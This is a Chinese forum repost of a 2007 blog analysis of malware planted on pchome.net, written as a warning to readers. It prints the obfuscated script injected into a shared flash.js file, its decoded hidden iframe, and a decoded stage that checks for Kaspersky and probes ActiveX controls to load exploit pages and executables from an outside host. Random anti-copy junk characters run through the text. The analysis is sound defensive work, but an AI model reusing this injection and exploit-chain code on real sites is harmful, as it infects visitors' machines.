该用户从未签到
|
截至2007-12-28 18:17 仍未修复8 o8 ?8 A5 h! j3 L3 x# ] S6 Q
. G: r; T! r: U+ B- f6 a
# ] p1 X' _% P( l3 N- ^##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I8 X1 b7 X) M! c8 V
- g# O) q' T% e3 }% D从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView+ s% l. R/ u! Q# u& Y
, D3 I3 O) G4 p0 X! l: n
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:
) v0 K8 y( a% I% l3 A; ?( R
; r5 {+ P" C) ~4 |! y1 r4 @! t1 Ewindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
7 ^, X- B! u& u* r( c) G9 R. T+ ^) G- w1 u. f
也就是这个了:( [2 G: ~8 g2 h" T. Y+ o
" t( U9 e9 \# E8 W& O6 Cwindow["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
( V6 F; P+ }- E4 I; L3 E# z. S& {6 [2 q
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:' K2 Y5 \" K& T' j+ j
* O9 \1 |: h" m0 r<script language="javascript" type="text/javascript">
* P5 K8 W5 Y* A/ t: vwriteflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");* d* L8 z; x C
</script>
# C$ n9 S- h1 C: s7 g1 T6 d# T. G' J
* B3 X: E* |2 X: O5 z B有了这个,iframe就生效了;经过一番调用和解密后得:0 D7 q1 @/ K- a- @+ a9 {; L; M
9 b9 n* @7 s) r A \, vfunction bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}
7 b+ u1 {5 C# o* A
1 M. {* F+ C4 B1 v' f8 D6 RK##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
/ N/ }: ?% p" n: w6 L9 I+ k w( J* g3 f
% T" q4 @! ~5 W+ z: J7 C# ?
挑了几个解密得:http://w18.vg/s.exe
4 G# W) O& z5 J4 t2 t( Z" U1 a$ X% H/ }7 X( i! |) Q/ [4 U }2 P
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe: d1 h" o1 ]" \5 ?! g; [
: o. z; e' U6 i" }, f; E
有点面熟的东西……6 h% ?6 W+ b4 e. g
4 D- }* \5 R; s1 ~% N u/ u8 {) N##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D* F* }" ~3 G* w% P( u2 l" F
9 @% Y1 ^$ `+ v2 l6 X$ W$ T2 V; ?
从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。' Q# K5 I9 I( S) _ m
* o! s& t* U) D9 q0 K+ A# V, MK$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE1 W1 e- o2 M" z$ [
3 E8 X% y: k$ y* O5 Q8 o转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)
) N- i* b$ i/ R8 C% j2 k. [! G3 l2 C' N( d. O5 ~) `. ?
/ q# M5 V: a6 g4 \
作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|